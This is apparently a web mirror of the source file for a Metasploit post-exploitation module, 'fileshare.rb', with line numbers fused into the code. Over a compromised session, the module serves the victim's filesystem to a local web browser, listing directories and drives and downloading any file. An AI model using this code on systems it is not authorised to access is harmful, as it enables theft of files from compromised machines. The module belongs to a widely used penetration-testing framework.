CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/post/multi/manage/fileshare.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##4require 'cgi'56class MetasploitModule < Msf::Post78include Msf::Post::File9include Msf::Exploit::Remote::HttpServer1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'Browse the session filesystem in a Web Browser',16'Description' => %q{17This module allows you to browse the session filesystem via a local18browser window.19},20'License' => MSF_LICENSE,21'Author' => [ 'timwr'],22'Platform' => [ 'linux', 'win', 'osx' ],23'SessionTypes' => [ 'meterpreter', 'shell', 'powershell' ],24'DefaultOptions' => { 'SRVHOST' => '127.0.0.1' },25'Notes' => {26'Reliability' => [ ],27'SideEffects' => [ ],28'Stability' => [ CRASH_SAFE ]29}30)31)32end3334def run35exploit36end3738def primer39uri = get_uri.chomp('/') + '/'40current_dir = pwd41if session.platform == 'windows'42current_dir = current_dir.gsub('\\', '/')43end44print_status("Current directory: #{uri}#{current_dir}")45end4647def list_path(file_path, uripath)48contents = []49if file_path == '/' && session.platform == 'windows'50get_drives.each do |drive|51driveurl = drive + ':/'52furl = uripath + driveurl53contents << [furl, driveurl]54end55return contents56end5758base_url = uripath59if file_path.starts_with?('/')60base_url = base_url.chomp('/')61end62base_url += file_path.chomp('/') + '/'63dir(file_path).each do |file|64next if ['.', '..'].include?(file)6566furl = base_url + file67contents << [furl, file]68end69contents70end7172def handle_response(cli, request_uri)73uripath = get_resource.chomp('/')7475# Convert http://127.0.0.1/URIPATH/file/ -> /file76if request_uri != uripath && request_uri.starts_with?(uripath)77file_path = request_uri[uripath.length, request_uri.length].chomp('/')78end79if file_path.blank?80file_path = '/'81end8283uripath += '/'8485# Convert /C: -> C:/86if session.platform == 'windows'87if file_path.starts_with?('/')88file_path = file_path[1, file_path.length]89end90if /([A-Z]):$/ =~ file_path91file_path += '/'92end93end94if file_path.blank?95file_path = '/'96end9798print_status("Request uri: #{request_uri} file_path: #{file_path} from #{cli.peerhost}")99root_dir = (file_path == '/')100101if file?(file_path) && !root_dir102# Download the file103data = read_file(file_path)104send_response(cli, data, { 'Content-Type' => 'application/octet-stream', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0' })105return106elsif directory?(file_path) || root_dir107# List the directory108body = "<h2>Directory listing for #{CGI.escapeHTML(file_path)}</h2><hr>"109body << "<ul>\n"110unless root_dir111basedir = request_uri[0, request_uri.chomp('/').rindex('/')]112if basedir.blank?113basedir = '/'114end115body << "<li><a href=\"#{CGI.escapeHTML(basedir)}\">..</a>\n"116end117list_path(file_path, uripath).each do |furl, fname|118body << "<li><a href=\"#{CGI.escapeHTML(furl)}\">#{CGI.escapeHTML(fname)}</a>\n"119end120body << "</ul>\n"121html = %(<html>122<head>123<META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">124<META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">125<title>Metasploit File Sharing</title>126</head>127<body>128#{body}129</body>130</style>131</html>132)133send_response(cli, html, { 'Content-Type' => 'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0' })134else135send_not_found(cli)136end137end138139def on_request_uri(cli, request)140handle_response(cli, request.uri)141rescue ::Rex::Post::Meterpreter::RequestError142cli.send_response(create_response(500, 'Unknown error'))143end144end145146147